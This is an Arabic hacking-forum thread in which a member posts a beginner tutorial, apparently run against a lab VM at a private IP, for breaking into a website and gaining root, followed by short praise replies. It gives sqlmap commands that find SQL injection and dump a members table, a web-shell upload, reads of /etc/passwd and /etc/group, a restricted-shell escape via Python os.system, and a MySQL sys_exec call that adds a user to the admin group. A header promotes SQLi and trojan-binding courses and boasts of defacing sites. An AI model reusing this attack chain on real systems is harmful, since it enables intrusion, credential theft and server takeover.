1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ طريقه ] أختراق الموقع والحصول على الروت للمبتدئين

الموضوع في 'آمن المواقع والسيرفرات' بواسطة One MaN, بتاريخ ‏17 نوفمبر 2014.

كاتب الموضوع : One MaN المشاهدات : 664 الردود : 13 ‏17 نوفمبر 2014
  1. غير متصل

    One MaN
    Developer

    عضو منذ:
    ‏22 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم

    اللهم انا نسالك علما نافع

    اللهم علمنا ماينفعنا وانفعنا بما علمتنا

    اليوم موضوعي بسيط للمبتدئين والطريق لاختراق الموقع والحصول على الروت

    بسم الله الرحمن الرحيم

    اول شي نبدا فيه هو فحص الاي بي بالان ماب عشان نشوف الخدمات اللي على الموقع

    [​IMG]

    مثل ماهو واضح الخدمات اللي شغاله ونقدر نشوف المنفذ 80 شغال يعني عليه موقع نفتح الموقع ونشوف وش مركب عليه

    [​IMG]

    نجرب علنا نلقا ثغرة في الموقع

    [​IMG]

    الحمدلله احتمال ثغرة سيكول انجكشن نجرب بالاداة sqlmap ونشوف وش النتيجة

    [​IMG]

    فعلا الثغرة موجودة وطلعت لنا قواعد البيانات

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms --dbs

    نحاول نجيب كلمة المرور واسم المستخدم بنفس الاداة

    [​IMG]

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms -D members -T members --dump
    نجرب نخش ونشوف يمكن نلقا مركز رفع

    [​IMG]

    للاسف مافيه شي

    نرجع نجرب الاداة nikto ونشوف وش النتيجة

    [​IMG]

    لقينا مجلد images وغالبا مايكون تصريحه قابل للكتابة نجرع sqlmap ونحاول نتصل اتصال عكسي

    [​IMG]

    لاحظوا المجلد اللي رافع عليه الشل وان شاء الله يقبل

    [​IMG]

    الحمدلله تم رفع الشل والاتصال

    الان نبي نشوف من اليوزرات ومن اللي له صلاحية الادمن

    ننفذ الامر cat /etc/passwd

    [​IMG]

    نشوف اليوزرات موجوده تحت وهي


    [SQL]loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
    john:x:1001:1001:,,,:/home/john:/bin/kshell
    robert:x:1002:1002:,,,:/home/robert:/bin/kshell[/SQL]


    طيب نشوف من في قروب الادمن منهم

    cat /etc/group

    [​IMG]

    نشوف اليوزر loneferret مضاف في قروب الادمن

    الان نحاول نتصل بقاعدة البيانات ونحاول نحط اليوزر جون اللي معنا الباسوورد تبعه في قروب الادمن

    نشوف

    [​IMG]

    كتبت الامر هذا عشان اشوف اليوزر والباسوورد المستخدم في قاعدة البيانات نستخدم المعلومات هذي للاتصال

    نتصل عن طريق البورت 22 من البيوتي او ssh اللي حاب

    [​IMG]

    الحمدلله الاتصال ناجح

    وكتبت الامر


    كود PHP:
    echo __import__('os').system("/bin/bash")

    لان الشل فيه ثغرة وبكذا نقدر نستخدمه كاستخدام الشل المحلي

    نخش على قاعدة البيانات

    [​IMG]

    الان ننفذ الامر


    كود PHP:
    select sys_exec('usermod -a -G admin john')

    [​IMG]

    نطلع من قاعدة البيانات ونشوف وش النتيجة

    [​IMG]

    الحمدلله تم ترويت السيرفر

    وهذي احدى الطرق والسيرفر فيه عدة ثغرات تقدر تجيب منها روت

    واعذروني على الشرح السريع​
     


    جاري تحميل الصفحة...
  2. غير متصل

    BLaCk HoLe
    rank
    Developer

    عضو منذ:
    ‏9 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك
    ونتظر منك الجديد
     


  3. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    \عاشت الايادي مبدع شرح كافي ووافي عشت:ُeُe$1:\
     


  4. غير متصل

    D3VIL H4CK3R
    Developer

    عضو منذ:
    ‏4 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه ... تسلم ايديك ي حبيبي
     


  5. غير متصل

    Black-Heart
    V • I • P

    عضو منذ:
    ‏24 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك حبيبي وشرح رائع ومفهوم
     


  6. غير متصل

    HaMaM-HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك اخوي :{1!}:
     


  7. غير متصل

    AlKOrtanY
    rankrank
    Developer

    عضو منذ:
    ‏24 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه اخوي
     


  8. غير متصل

    -AL SenatoOoR-
    V • I • P

    عضو منذ:
    ‏14 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    41
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك يابطل استمر [​IMG]
    شرح مفوهم ومتعوب عليه ايضأ تم الوشم {1!9}
    لاتحرمنا من ابداعك:{3!}:​
     


  9. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافية
     


  10. غير متصل

    Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: أختراق الموقع والحصول على الروت للمبتدئين

    تسلم لي على الشرح الجميل والمفيد
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...